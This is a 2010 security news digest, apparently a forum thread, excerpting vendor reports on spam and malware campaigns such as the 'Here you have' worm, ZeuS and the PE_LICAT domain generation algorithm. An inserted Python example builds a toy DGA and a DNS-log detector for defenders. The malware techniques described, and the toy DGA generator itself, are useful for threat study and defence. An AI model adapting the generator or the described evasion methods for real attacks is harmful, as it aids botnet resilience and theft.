September 3, 2010 - "... Some Ping posts are attempting to trick users into believing they will receive a free iPhone if they complete online surveys. Sophos published research earlier this year demonstrating a 70 percent increase in the number of users reporting spam and malware being spread via social networks, a trend that continues to grow. It would appear that Apple missed that report..."


2010-09-07, 15:13

Survey SPAM on YouTube
- http://www.sophos.com/blogs/gc/g/2010/09/07/video-fan-scammer-survey-spam-youtube
September 7, 2010 - "... themes that has been coming through loud and clear in the security world for the last few months has been the use by scammers of revenue-generating surveys... mostly impacting Facebook users, where unsuspecting computer owners click on a link shared with them via the social networking site only to discover that they have to complete a survey before seeing some typically salacious content. The scammers, meanwhile, earn their crust by receiving a small commission for each survey that is completed. These survey scams, however, are not just limited to Facebook... It doesn't matter if you receive a message via Facebook, YouTube or traditional email - you should always be suspicious of unsolicited communications and think before you click."


2010-09-08, 16:15

Cybercrime strikes more than 2/3 of Internet Users
- http://www.symantec.com/about/news/release/article.jsp?prid=20100908_01
September 8, 2010 - "... You might be just one click away from becoming the next cybercrime victim. A new study released today from security software maker Norton reveals the staggering prevalence of cybercrime: Two-thirds (65 percent) of Internet users globally, and almost three-quarters (73 percent) of U.S. Web surfers have fallen victim to cybercrimes, including computer viruses, online credit card fraud and identity theft. As the most victimized nations, America ranks third, after China (83 percent) and Brazil and India (tie 76 percent). The Norton Cybercrime Report: The Human Impact* shines a light on the personal toll cybercrime takes... victims’ strongest reactions are feeling angry (58 percent), annoyed (51 percent) and cheated (40 percent), and in many cases, they blame themselves for being attacked. Only 3 percent don’t think it will happen to them, and nearly 80 percent do not expect cybercriminals to be brought to justice — resulting in an ironic reluctance to take action and a sense of helplessness... Despite the emotional burden, the universal threat, and incidents of cybercrime, people still aren’t changing their behaviors - with only half (51 percent) of adults saying they would change their behavior if they became a victim. Even scarier, fewer than half (44 percent) reported the crime to the police... According to the report, it takes an average of 28 days to resolve a cybercrime, and the average cost to resolve that crime is $334. Twenty-eight percent of respondents said the biggest hassle they faced when dealing with cybercrime was the time it took to solve..."
* http://cybercrime.newslinevine.com/

Cybercrime Map:
- http://i.i.com.com/cnwk.1d/i/tim//2010/09/07/SymantecCybercrimeMap.png


2010-09-10, 15:18

'Here you have...' SPAM/virus
- http://isc.sans.edu/diary.html?storyid=9529
Last Updated: 2010-09-09 21:49:06 UTC ...(Version: 2) - "We are aware of the "Here you have" malware that is spreading via email. As we find out more, we'll update this diary.
Update: 2010-09-09 21:28 UTC (JAC) There are several good writeups on the behavior of this malware; see some of the references below. The spam contains a link to a document, the link looks like it is to a PDF, but is, in fact, to a .SCR file and served from a different domain from what the link appears to point to. The original file seems to have been removed, so further infections from the initial variant should not occur, but new variants may well follow. The .SCR when executed downloads a number of additional tools, one of which appears to attempt to check in with a potential controller. The name associated with the controller has been sink-holed. The malware attempts to deactivate most anti-virus packages and uses the infected user's Outlook to send out its spam.
File name: PDF_Document21_025542010_pdf.scr
Submission date: 2010-09-09 18:52:15 (UTC)
Result: 13/43 (30.2%)

- http://sunbeltblog.blogspot.com/2010/09/here-you-have-worm.html
September 10, 2010 - "... The subject line on the email was “Here you have” or “Just For you”..."

- https://kc.mcafee.com/corporate/index?page=content&id=KB69857&actp=LIST
Last Modified: September 09, 2010 - "... confirmation that some customers have received large volumes of spam containing a link to malware, a mass-mailing worm identified as VBMania. The symptom reported thus far is that the spam volume is overwhelming the email infrastructure. Static URLs in the email link to a .SCR file. McAfee recommends that customers filter for the URL on gateway and email servers, and block the creation of .SCR files on endpoint systems..."

- http://www.symantec.com/connect/blogs/handling-internal-mail-storms-reply-all-and-here-you-have-virus
September 10, 2010 - "... the huge volume of traffic can actually take down servers...
1. Outbreak detection: Identify that an active outbreak is occurring because of the volume of traffic generated by the same malicious email
2. Internal mail filtering: Block all internal traffic of the "Here you Have" email* using Content Filtering
3. Mail store / inbox cleanup: Seek out and eliminate the "Here you Have" email from Mail Stores and end user inboxes..."
(Suggested add: "Just For you")

- http://www.symantec.com/connect/blogs/new-round-email-worm-here-you-have
September 9, 2010 - "... confirmed reports of a worm spreading through email under the subject "Here you have". The mail to the unsuspecting recipient claims to be providing a document available through a URL. The URL is spoofed and actually points to a malicious binary being hosted on a different server..."

- http://community.websense.com/blogs/securitylabs/archive/2010/09/10/quot-here-you-have-quot-email-campaign-malicious-SCR-mascarading-as-a-PDF.aspx
10 Sep 2010 - "... When the user clicks and follows the link, a malicious file is downloaded, which further spreads the email campaign by pillaging the user's Outlook address book. This makes the attack more convincing as the source of the email could be legitimate and trusted..."

- http://www.theregister.co.uk/2010/09/10/email_worm_spreading/
10 September 2010 - "... McAfee said multiple variants of the worm appear to be spreading, so it's not yet clear that the malicious screensaver is hosted by a single source."

- http://www.symantec.com/security_response/threatconlearn.jsp
9/10/2010 - "The ThreatCon is currently at Level 3: High. The ThreatCon has been raised to Level 3 due to increased activity. Symantec is observing a new threat spread through a socially engineered email attack. The email convinces the recipient to follow a link to open a malicious binary (disguised as a PDF)..."

- http://www.virustotal.com/file-scan/report.html?id=fedb7b404754cf85737fb7e50f33324b84eb4c0b98024c7d3302039a901b04b7-1284133892
File name: csrss.exe
Submission date: 2010-09-10 15:51:32 (UTC)
Result: 32 /43 (74.4%)

- http://blogs.technet.com/b/mmpc/archive/2010/09/10/update-on-the-here-you-have-worm-visal-b.aspx
10 Sep 2010 4:40 PM

- http://www.microsoft.com/security/portal/blog-images/visal-b.png
Charted - Sep. 10, 2010 18:59 GMT


2010-09-12, 00:30

“Here you have” worm linked...

- http://www.secureworks.com/research/threats/visal-b/
September 22, 2010 - "... Prevention:
In addition to network-based monitoring and detection, CTU recommends the following steps to help protect your organization from this and future threats.
• Avoid clicking links in email messages...
• Disable AutoRun...
• Limit user privileges...
• Secure WMI...
• Update host and gateway antivirus product signatures...
• Think twice before allowing your web browser to remember your passwords for you..."

- http://pandalabs.pandasecurity.com/here-you-have-worm-linked-to-electronic-jihadists/
Sep 10

- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=227400137
Sept. 10, 2010

- http://ddanchev.blogspot.com/2010/09/summarizing-3-years-of-research-into.html
September 11, 2010

- http://www.computerworld.com/s/article/9184818/Anti_US_hacker_takes_credit_for_Here_you_have_worm
September 12, 2010

- http://www.theregister.co.uk/2010/09/13/hacker_claims_credit_for_here_you_have_worm/
13 September 2010

- http://www.symantec.com/security_response/writeup.jsp?docid=2010-082013-3322-99&tabid=2


2010-09-12, 18:51

Flood of phishing sites...
- http://news.cnet.com/8301-27080_3-20016026-245.html
September 10, 2010 - "... Cybercriminals are cranking out fake Web sites branded as eBay, banks, and other financial companies to the tune of tens of thousands every week, according to new research. During a three-month study of its global malware database, Panda Security found on average 57,000 new Web sites created each week with the aim of exploiting a brand name in order to steal information that can be used to drain peoples' bank accounts. About 80 percent of those were phishing sites designed to trick people into entering their login credentials or other information on what they believed to be a legitimate bank or other Web site... America, PayPal, Internal Revenue Service, and Bendigo Bank (Australia). For the phishers, banks were obviously the most popular choice to mimic, at 65 percent of the total, followed by online stores and auction sites, investment funds and stockbrokers, government organizations and payment platforms..."
- http://i.i.com.com/cnwk.1d/i/tim//2010/09/09/PandaLabsFakeSites_610x347.png

Money-mule fakes...
- http://krebsonsecurity.com/2010/09/a-one-stop-money-mule-fraud-shop/
September 13th, 2010


2010-09-13, 19:03

More malware 4 U today...

- http://www.pcworld.com/article/205338/google_exec_instant_why_worry.html
13 Sep 2010 - "... gives SEOs more opportunities to apply their expertise than ever before..."

- http://www.symantec.com/connect/blogs/hydraq-aurora-attackers-back
13 Sep 2010 - "... we were quite certain that the gang behind Trojan.Hydraq hadn't gone away. It looks like they are back..."

- http://community.websense.com/blogs/securitylabs/archive/2010/09/13/malicious-pdf-challenges.aspx
13 Sep 2010 - "... PDF obfuscation that we have recently seen in a mass injection..."


2010-09-15, 14:02

Recent SPAM / fakes ...
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Threat Outbreak Alert: Fake Fax Notification E-mail Messages...
September 14, 2010
Threat Outbreak Alert: Fake Craigslist Ticket E-mail Messages...
September 14, 2010
Threat Outbreak Alert: Fake Online Poker Winner Notification E-mail Messages...
Updated! September 13, 2010
Threat Outbreak Alert: Fake Trojan Analysis E-mail Messages...
September 13, 2010
Threat Outbreak Alert: Fake Western Union Money Transfer Notification E-Mail Messages...
September 13, 2010
Threat Outbreak Alert: Fake iToken Update E-mail Messages...
Updated! September 11, 2010 ...

- http://sunbeltblog.blogspot.com/2010/09/letting-texas-holdem-chips-fall-where.html
September 15, 2010 - "... another Facebook scam... adware-infected games and job search help..."


2010-09-16, 11:11

Zeus malicious email msgs...
- http://community.websense.com/blogs/securitylabs/archive/2010/09/15/cash-quot-labels-and-such-quot-leads-to-zeus.aspx
15 Sep 2010 - "Websense... has detected another wave of Zeus malicious email messages. This campaign is related to the familiar "pharma" spam messages that we see every day, with one exception. This campaign combines an HTML or ZIP attachment with a social engineering technique, similar to what we normally see in malicious email campaigns. For example, the message may state that $375 has been sent to a mail recipient's account, and include a link to view the transaction in the recipient's account. Opening the attachment results in a compromised user machine via an obfuscated JavaScript in the attached HTML file. So far, we have seen this type of email with subjects like "Labels and such" and "Greetings from Rivermark Bill Payer!"... In the case of an HTML attachment, criminals use obfuscated JavaScript. Content is encrypted with a commercially available HTML obfuscation tool... For email messages that have ZIP attachments, the ZIP file has coverage in VirusTotal - 5/43*. The "label.zip" file contains "label.exe" which is a copy of Zeus. The malware copies itself to "C:\Documents and Settings\user\Application Data\Ewca\refef.exe" and tries to access two sites located in the .ru zone..."
(There is a more up-to-date report (12/43) for this file.)
* http://www.virustotal.com/file-scan/report.html?id=419ccc9269f56ec812f116b6d6e7dc68dfaaed4cba9d9931b16a8f7516237303-1284603849
File name: e7023277449d3df3ed1af4ff757b1f7e
Submission date: 2010-09-16 02:24:09 (UTC)
Result: 12/43 (27.9%)

Zeus: http://searchsecurity.techtarget.com/sDefinition/0,,sid14_gci1431252,00.html
"... Because a Trojan built with a Zeus toolkit is so adaptable, variations of Zeus Trojans are often missed by anti-virus software applications. According to a report by security vendor Trusteer, 77% of the PCs infected with Zeus Trojans have up-to-date anti-virus software..."


2010-09-17, 12:27

Songlyrics.com compromised/injected...
- http://community.websense.com/blogs/securitylabs/archive/2010/09/16/let-s-sing-malicious-song.aspx
16 Sep 2010 - "... Websense... has detected that the popular site Songlyrics.com (with approximately 200,000 daily page views and 2,000,000 unique visitors) is compromised and injected with obfuscated malicious code... Once a user accesses the main page of the song lyrics site, injected code redirects to an exploit site loaded with the Crimepack exploit kit. Attempted exploits result in a malicious binary (VT 39.5%*) file that's run on the victim's computer. Once infected, the machine becomes another zombie-bot in the wild... It appears that the majority of pages served by Songlyrics.com are compromised..."
(Screenshots and more detail available at the Websense URL above.)

(There is a more up-to-date report (21/43) for this file.)
* http://www.virustotal.com/file-scan/report.html?id=53d61718464b6ff5b961aa2c86f0b9ba42820eed50e22636f4c4d1667391fb01-1284689796
File name: addeedd60b7be1fb234aceaf2eef824e
Submission date: 2010-09-17 02:16:36 (UTC)
Result: 21/43 (48.8%)

Facebook / Youtube - compromised webpages
- http://www.theinquirer.net/inquirer/news/1733750/facebook-701-compromised-webpages
Sep 17 2010 - "... AVG is warning users of social notworking services to be on their guard after its research uncovered the 20,000 odd compromised pages, 11,701 of which are on the world's largest social network, Facebook. The insecurity outfit also found that Youtube has 7,163 compromised pages..."
- http://www.avg.com/us-en/press-releases-news.tpl-mcr7.ndi-232491


2010-09-22, 12:20

Cutwail SPAM cocktail
- http://labs.m86security.com/2010/09/cutwails-spam-cocktail/
September 21, 2010 - "... we have regularly observed spam campaigns where an HTML attachment contains obfuscated JavaScript redirect code. The Pushdo botnet’s spamming component, Cutwail, has been the culprit behind these types of malicious campaigns. Many different themes and subject lines have been used, such as the following:
America’s Got Talent
Apartment for rent
Shipping Notifications
Labels and such
Invoice for Floor Replacement
Delivery Status Notification (Failure)
Welcome Letter
NFL Picks Week 2
... and other random subjects including... one that uses celebrity names... The attached HTML source code is an obfuscated JavaScript... many variations... After de-obfuscating the JavaScript, we can see the payload which, depending on the sample, varies between redirecting to Fake AV landing pages, Canadian Pharmacy or to pages that host an exploit that attempts to install the Zeus Bot... At the same time, Cutwail is also emitting other malicious spam campaigns, but with ZIP attachments. Extracting the ZIP reveals an executable that is none other than the Sasfis/Oficla Trojan. When we ran a sample, the Trojan was tasked to download a Fake AV downloader... Despite multiple attempts to take down Pushdo’s infrastructure, the gang behind this botnet are resilient... Pushdo’s spam volume has bounced back to levels similar to that before the takedown (representing about 10% of total spam), signifying that the gang’s business is back on track. So expect more malicious spam campaigns, exploits, and social engineering to come..."
(Screenshots available at the URL above.)

- http://blog.webroot.com/2010/09/22/malicious-html-mail-attachments-flood-inboxes/
September 22, 2010


2010-09-23, 19:43

Russian Pro-Spam Registrars
- http://labs.m86security.com/2010/09/russian-pro-spam-registrars/
September 22nd, 2010 - "Since CNNIC, China’s domain regulator, introduced stricter rules for domain registration at the end of last year, spammers have moved on to the Russian .ru TLD to register their spam domains. Similar rules that were apparently made effective on April 1st for Russian registrars do not seem to have had the same effect. Every day we see a continuous stream of newly registered .ru domains in spam email. In fact, in the last month one third of all unique domains we have seen in spam have been .ru domains. This is the highest proportion of any TLD, with .com the second highest accounting for just under one third of spammed domains. Nearly all of these .ru domains are registered through two registrars, Naunet and Reg.ru (also known as NAUNET-REG-RIPN and REGRU-REG-RIPN)... In the last month from spam alone we have seen over 4000 .ru domains registered through Naunet. These are hosting a variety of spam web sites including Ultimate replica, Dr Maxman, online casinos, Via grow and Eurosoft software. We have also seen over 1800 domains registered through Reg.ru in spam over the last month, all of which lead to Canadian pharmacy websites. Reg.ru actually has a feature to register up to 600 domains at once, pretty useful for a spammer... We have however seen domains registered with both of these registrars used as controllers for the Zeus crimeware kit. And recently, Naunet was used to register domains used as control servers for the Asprox botnet, although these were done on a much smaller scale than the spam domains. Several anti-spam groups have already pointed out these registrars as the source of Russian spam domains and that these registrars often ignore requests to suspend illegal domains. With domain blacklisting being a popular anti-spam measure, a continuous supply of fresh domains is vital for any spam operation. These sorts of registrars are making the business of spamming that much easier."


2010-09-25, 23:39

My Opera Found To Host Malware
- http://threatpost.com/en_us/blogs/my-opera-found-host-malware-092410
September 24, 2010 - "... Less than a month after Google's Code hosting service was found to be hosting and serving malicious executables, a search of Opera Software's My Opera free hosting service has also turned up malicious programs, according to a researcher at Kaspersky Lab*. My Opera, a free online hosting service for users of the Opera Web browser, played host to a PHP based IRC botnet, according to a post by Dmitry Bestuzhev, a researcher at Kaspersky Lab. The bot appears to have originated in Brazil, based on an analysis of the code, though it's not clear who posted it to the My Opera hosting service or when, Bestuzhev said... he reported the malicious My.Opera .com URLs to Opera Software and that the company has removed them from its site... Like other free hosting services, My.Opera .com is an ideal resource for cyber criminals looking to host their wares on domains with legitimate reputations that are also easy to access..."
* http://www.securelist.com/en/blog/2303/Google_Mozilla_and_now_Opera_Whos_next


2010-09-28, 14:11

Orkut worm - hidden iFrame - malicious JavaScript file...
- http://www.symantec.com/connect/blogs/mau-sabado-orkut-users
Sep. 28, 2010 - "Over the past weekend, it was reported that a new worm was spreading amongst the Orkut user community. As a result, some of the Scrapbooks in Orkut had a hidden iframe inserted, which points to a malicious JavaScript file. This JavaScript does several things including sending a message “Bom Sabado”, meaning Good Saturday in Portuguese, with a hidden iframe to everyone on the infected user’s list of friends. The infected Orkut user is also made to join fake communities. These actions will surely turn “Bom Sabado” to “Mau Sabado” (bad Saturday in Portuguese). Symantec Security Response detects this malicious JavaScript file as JS.Woorkut. At the end of the day, this worm doesn’t do much harm. If the attacker behind this mischief is maliciously motivated, the worm could potentially cause serious damage. We are quite sure this won’t be the last of this attack and are closely monitoring the situation. In the meantime make sure you keep your antivirus definitions up to date."


2010-09-28, 16:30

Facebook - flood of scams...
- http://www.symantec.com/connect/blogs/social-network-flooded-scam-messages
Sep. 28, 2010 - "Facebook now has over 500 million registered users, which makes this social network (like many other social networks) a very attractive “fishing pool” for attackers. There are so many potential victims that could easily fall for any of the scattered bait. So, it does not come as a surprise that we see another scam campaign launched nearly every week... Always be wary of enticing messages, even when they appear on friends’ profiles. When you are asked to install additional applications or fill out premium surveys just to see a video or picture, it is most likely a scam and it should be fully ignored..."


2010-09-29, 23:14

ZeuS bypasses 2-factor authentication...
- http://blog.trendmicro.com/zeus-now-bypasses-two-factor-authentication/
Sep. 29 2010 - "... certain ZeuS/ZBOT variants are now able to break into users’ bank accounts in spite of two-factor authentication systems. These are frequently used to enhance bank security. These ZeuS variants can specifically use mobile malware to defeat systems that rely on text messages sent via mobile phones on Symbian OS's. The technique behind these attacks is simple. A ZBOT variant modifies target bank sites in such a way that whenever the bank asks for an authentication code to be sent to the mobile phone or not, the user is prompted to enter that phone’s number first. The user then receives a text message containing a link to a rogue Symbian application. This piece of mobile malware, once installed, intercepts all text messages from the specific senders (e.g., banks) and forwards them to a separate number under the control of the attacker. Because the attacker has both the victim’s user name, password, and any authentication code sent over the mobile phone, he/she can conduct malicious business as if the two-factor authentication never took place. While two-factor authentication is definitely a good thing in terms of security, this attack is a reminder that it is not a cure-all that protects against all forms of information theft..."

- http://blog.fortinet.com/zeus-in-the-mobile-zitmo-online-bankings-two-factor-authentication-defeated/
Sep 27, 2010

- http://www.securityweek.com/zeus-goes-mobile-targets-online-banking-two-factor-authentication
Sep 27, 2010

- http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-iii.html
Sep 25, 2010


2010-09-30, 12:17

LinkedIn SPAM campaigns continue...
- http://labs.m86security.com/2010/09/malicious-linkedin-campaigns-continue/
September 30, 2010 - "The malicious LinkedIn spam campaigns of the last few days are continuing in force. The source is the Pushdo botnet, which is back in full force following disruption to its operations last month. The campaigns mimic a LinkedIn update notification... The malicious web page displays code that includes an iframe that loads the Phoenix exploit kit, which attempts to exploit the victim’s browser... And, just in case the auto-exploit doesn’t work, the user is prompted to manually download flash_player_07.78.exe, which is none other than the Zeus (Zbot) data stealing trojan... This campaign is slicker than normal. The LinkedIn email and the Flash Player download image look convincing, signifying that these cybercriminals have taken it up a notch. Going by the number of URL hits we intercepted with our TRACEnet system, some users are falling for it too. Don’t be one of them."
(Screenshots available at the URL above.)

- http://krebsonsecurity.com/2010/09/fake-linkedin-invite-leads-to-zeus-trojan/
Sept 28, 2010
- http://www.virustotal.com/file-scan/report.html?id=1dc848df1d294af28459e4c224e78361114bec79ae48564b27724b0613407e65-1285599788
File name: 655823
Submission date: 2010-09-27 15:03:08 (UTC)
Result: 4/43 (9.3%)
[There is a more up-to-date report (29/43) for this file.]
- http://www.virustotal.com/file-scan/report.html?id=1dc848df1d294af28459e4c224e78361114bec79ae48564b27724b0613407e65-1285857284
File name: ZeuS_binary_4f56196d437be7e1bfecefb92b83872d.exe
Submission date: 2010-09-30 14:34:44 (UTC)
Result: 29/43 (67.4%)


2010-09-30, 21:56

Zeus thieves charged ...
Feds accuse 37 of being Zeus 'money mules'...
- http://www.theregister.co.uk/2010/09/30/zeus_money_mules_charged/
30 September 2010 - "Federal prosecutors in New York City have charged 37 people with participating in a scheme that defrauded banks out of millions of dollars using the Zeus Trojan. Many of the charges were filed against Russian nationals accused of opening bank accounts to launder money transferred from people who had been infected by the crimeware. The so-called money mules allegedly kept a small percentage and wired the remainder to associates in Eastern Europe. The charges were unsealed on Thursday, a day after UK prosecutors filed charges against 11 alleged Zeus money mules* from Eastern Europe..."
* http://www.theregister.co.uk/2010/09/30/zeus_e_crime_charges/

- http://krebsonsecurity.com/2010/09/u-s-charges-37-alleged-money-mules/
Sept 30, 2010 - "... charged more than 60 individuals — and arrested 20..."
- http://www.fbi.gov/wanted/alert/newyork2.htm

- http://www.theinquirer.net/inquirer/news/1736699/more-arrests-zeus-botnot-crimes
Oct 01 2010 - "Over 80 arrested ... 55 people have already been charged and a further 37 people have been indicted for a raft of fraud and money laundering charges..."

- http://www.theregister.co.uk/2010/10/01/zeus_kingpin_arrest/
1 October 2010 - "Ukrainian police on Thursday arrested five people suspected of orchestrating an international fraud ring that siphoned more than $70m out of bank accounts by infecting computers with the Zeus trojan. The action by Ukraine's SBU was part of an unprecedented partnership among law enforcement agencies in the US, the UK, the Netherlands, and Ukraine, the FBI said in a press release* issued on Friday..."
* http://www.fbi.gov/pressrel/pressrel10/tridentbreach100110.htm

- http://www.fbi.gov/page2/oct10/cyber_100110.html


2010-10-04, 14:31

ZeuS trojan still a threat...
- http://www.pcworld.com/article/206841/despite_busts_zeus_trojan_still_threatens.html
Oct 3, 2010 - "Despite high-profile busts in the U.S., U.K. and Ukraine of cybercriminals using ZeuS malware to steal from online accounts, ZeuS will evolve and remain an effective theft tool for a long time... It's available; it's affordable; it works; its toolkit makes modifying it simple. And the core people who do the major development work have managed to elude capture, hiding behind layers of shifting command and control servers, ISPs, domain registrars and international borders... researchers recently discovered that a ZeuS add-on helps defeat attempts by banks to thwart access by thieves who have used ZeuS to steal usernames and passwords of online banking customers. After users log in, the banks send SMS messages to their cell phones containing one-time codes that the customers enter. This two-factor authentication makes it more difficult for criminals to break into accounts, but the developers of ZeuS found a way. A mobile ZeuS Trojan grabs the one-time code and sends it to a ZeuS command and control server where criminals can use it to break into accounts... The people behind ZeuS are good at hiding, says Manky. They use multiple ISPs, multiple command-and-control servers, multiple domains and base this infrastructure in multiple countries, all of which makes it difficult to trace their whereabouts. Compounding the problem, they frequently shift their infrastructure to new providers and new locations to start over... the flexibility of ZeuS makes it certain its attacks will keep coming..."

More Arrests...
- http://www.symantec.com/connect/de/blogs/zeus-explosion-leads-more-arrests
Oct 4, 2010

Charted - ZeuS infections
- http://www.symantec.com/connect/sites/default/files/images/Zbot%20infections.PNG


2010-10-05, 22:45

iTunes store - SPAM campaign
- http://pandalabs.pandasecurity.com/itunes-store-spam-campaign/
10.01.10 - "Right after the LinkedIn Spam Campaign, we saw a brand new Spam Campaign impersonating the iTunes Store. The e-mail appears to arrive on behalf of the iTunes Store and is an exact copy of the official iTunes Store Receipt e-mail... The whole purpose of the email is not to show what you have purchased from the iTunes Store; it is to get you to click “Report a Problem” and lead you to a fake Adobe Flash installer... The exe file is actually connecting to some .ru web site to download some other files..."
(Screenshots available at the URL above.)

- http://www.esecurityplanet.com/features/article.php/3906831/Zeus-Phishing-Campaign-Targets-iTunes-Customers.htm
October 5, 2010 - "... the new scam discovered this week starts with an unsolicited email with the subject, "Your receipt #" followed by a random number. The sender's address claims to be "iTunes Store" and spoofs the address donotreply@itunes[dot]com. Within the email is a bogus iTunes receipt complete with formatting and syntax that makes it pretty clear that it's not from Apple's popular online music store, including the alleged "unit price" and "order total." In the example provided on the AppRiver security blog*, the math didn't add up and the charges for the bogus purchases were several hundred dollars, a figure that would likely raise suspicion among even the most naïve Internet users. The problem, however, is that when users click on any of the links contained within the email, they're redirected to one of 100 or more domains ending in .info where the malicious Zeus Trojan malware is then installed on their PCs or mobile devices..."
* http://blogs.appriver.com/blog/appriver/0/0/no-thanks-for-your-purchase


2010-10-07, 23:01

Browser exploits delivered as HTML attachments
- http://blog.urlvoid.com/browsers-exploits-delivered-as-html-attachment/
October 6, 2010 - "We have logged more than 300 email messages with various attached HTML files containing obfuscated javascript code that is used to redirect the users to download malicious executable files that install the ZBot banking trojan. We also noticed that some HTML files have redirected us to external urls containing web browser exploit kits with the intent to exploit a few IE, FF, PDF and Java vulnerabilities, in order to install (the) TDSS rootkit..."
(Screenshots and email/SPAM subjects at the URL above.)


2010-10-08, 14:33

3.5B malicious URLs... 1H-2010 Threat Report
- http://blog.trendmicro.com/emea-spam-growth-apac-infections-in-global-1h-2010-threat-report/
Oct 6, 2010 - "... Threat Report for the first half of the year. The report focuses on the global trends in online threats that we have seen.
• Threat Trends: Europe became the largest source of spam globally in the first half of the year... Commercial, scam-based, and pharmaceutical/medical SPAM accounted for 65 percent of the total number of SPAM worldwide. HTML SPAM was the most common kind of SPAM.
• We saw significant growth in the number of malicious URLs, which increased from 1.5 billion at the start of the year to over 3.5 billion by June...
• Trojans accounted for about 60 percent of the new patterns... The majority of Trojans lead to data-stealing malware...
• India and Brazil were identified as the countries with the greatest number of computers that became part of botnets. These bots are used to distribute malware, to perpetrate criminal attacks, and to send out SPAM.
• The education sector was the most targeted industry... Nearly half of all malware infections occurred within schools and universities...
• The ZeuS and KOOBFACE malware families were among the most prolific... Hundreds of new ZeuS variants are seen... every day and this is not likely to change in the near future... the KOOBFACE botnet has become the largest social networking threat to date...
• In the first half of 2010, a total of 2,552 vulnerabilities were reported... These vulnerabilities facilitated “drive-by” threats wherein all that is necessary to become infected is to -visit- a compromised website..."

- http://blog.urlvoid.com/1000-hacked-websites-used-for-blackhat-seo/
July 15, 2010


2010-10-09, 10:17

DOWNAD/Conficker II ?...

- http://blog.trendmicro.com/file-infector-uses-domain-generation-technique-like-downadconficker/
Oct 7, 2010 - "... This threat, detected as PE_LICAT.A, uses a domain generation algorithm, a technique last seen in WORM_DOWNAD/Conficker variants. This technique allows the file infector to download and execute malicious files from various servers on the Internet. Like WORM_DOWNAD, PE_LICAT.A generates a list of domain names from which it downloads other malicious files. The domain name generation function is based on a randomizing function, which is computed from the current UTC system date and time. This particular randomizing function returns different results every minute... whenever a file infected by PE_LICAT.A is executed, the malware generates a pseudorandom domain name, with the exact value depending on the system’s time. It then tries to connect to the said domain name. If it is successful, it downloads and executes the file at that pseudorandom URL. If not, it tries up to 800 times, generating a “new” URL every time. This helps ensure that the malware will be able to keep itself updated and even if one or more domains are taken offline, others can take its place..."
- http://blog.trendmicro.com/links-between-pe_licat-and-zeus-confirmed/
Oct 8, 2010 - "... We have been able to isolate a copy of the main file infector, which we detect as PE_LICAT.A-O... It injects itself into the Explorer.exe process, which has two effects. First, it becomes memory resident. Secondly, any file executed afterwards becomes infected with malicious code and is detected as PE_LICAT.A. We have looked into the pseudorandom domains that LICAT uses to download files from. Every time PE_LICAT.A is executed it attempts to download files from these domains, trying to do so a maximum of 800 times... Our monitoring indicates that most of these domains have not been registered. A small number have been registered, and although some of the sites these actually lead to are currently inaccessible, some are still alive and active... These domains appear to link PE_LICAT and ZeuS. Several of the domains that PE_LICAT was scheduled to download files from in late September are confirmed to be known ZeuS domains in that period... Another domain was hosted on an ISP that has seen significant levels of ZeuS-related activity in the past, and is a known haven for cybercrime... The downloader file shows certain behavior often associated with ZeuS..."

- http://blog.trendmicro.com/zeuss-response-to-automated-analysis/
Updated... Oct. 14, 2010
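The two Trend Micro posts above describe the defensively useful property of a time-seeded DGA: once the function is reverse-engineered, every domain an infected host could contact in a given window is predictable. The following is an added example (not Trend Micro's code and not the real PE_LICAT function): `dga_domain()` is a constructed stand-in keyed on the UTC minute and an attempt counter, and the DNS query log format and sample lines are constructed assumptions.

```python
"""Defender-side use of a known, time-seeded domain generation algorithm.

Added example, not Trend Micro's code and not the PE_LICAT algorithm:
dga_domain() is a constructed stand-in that only mimics the properties the
write-up describes (keyed on the UTC minute, up to 800 attempts per run).
Once a DGA has been reverse-engineered, a defender can precompute every
domain an infected host could query in a time window and use that set as a
blocklist / sinkhole list and as a detector over DNS query logs.
"""
import hashlib
from datetime import datetime, timedelta, timezone

TLDS = ("com", "net", "info")  # constructed; the real malware's TLD set is not given
MAX_ATTEMPTS = 800             # the write-up: "tries up to 800 times"


def dga_domain(minute, attempt):
    """Constructed toy generator: a hostname derived from the UTC minute and
    the attempt counter. Deterministic, so defenders can recompute it."""
    seed = f"{minute:%Y%m%d%H%M}:{attempt}".encode()
    digest = hashlib.sha256(seed).digest()
    label = "".join(chr(ord("a") + b % 26) for b in digest[:12])
    return f"{label}.{TLDS[digest[12] % len(TLDS)]}"


def candidate_domains(start, minutes, skew_minutes=0, attempts=MAX_ATTEMPTS):
    """Every domain a host could query while its clock reads a minute in
    [start - skew, start + minutes + skew). skew_minutes absorbs clients
    whose clocks are slightly off from UTC (the DGA keys on system time)."""
    if start.tzinfo is not None:
        start = start.astimezone(timezone.utc)
    start = start.replace(second=0, microsecond=0)
    first = start - timedelta(minutes=skew_minutes)
    span = minutes + 2 * skew_minutes
    return {
        dga_domain(first + timedelta(minutes=m), a)
        for m in range(span)
        for a in range(attempts)
    }


def parse_query(line):
    """Parse one constructed DNS query log line: '<ISO8601> <client> <qname>'."""
    ts, client, qname = line.split()
    return datetime.fromisoformat(ts), client, qname.rstrip(".").lower()


def find_dga_clients(log_lines, window_start, window_minutes, skew_minutes=1):
    """Return {client: [matched qnames]} for queries that hit the precomputed set."""
    candidates = candidate_domains(window_start, window_minutes, skew_minutes)
    hits = {}
    for line in log_lines:
        _, client, qname = parse_query(line)
        if qname in candidates:
            hits.setdefault(client, []).append(qname)
    return hits


# Constructed sample: one host runs the (toy) DGA at 12:34 UTC, another is clean.
WINDOW_START = datetime(2010, 9, 28, 12, 34, tzinfo=timezone.utc)
SAMPLE_LOG = [
    f"2010-09-28T12:34:0{i}+00:00 10.0.0.5 {dga_domain(WINDOW_START, i)}."
    for i in range(3)
] + [
    "2010-09-28T12:34:10+00:00 10.0.0.9 www.example.com.",
    "2010-09-28T12:35:02+00:00 10.0.0.9 update.example.net.",
]

if __name__ == "__main__":
    for client, names in find_dga_clients(SAMPLE_LOG, WINDOW_START, 2).items():
        print(client, "->", names)
```

Precomputing a whole day this way is 1440 x 800 hashes, cheap enough to regenerate daily for a resolver blocklist or sinkhole registration list.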


2010-10-13, 13:58

LinkedIn attack also spread Bugat trojan...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=227701191
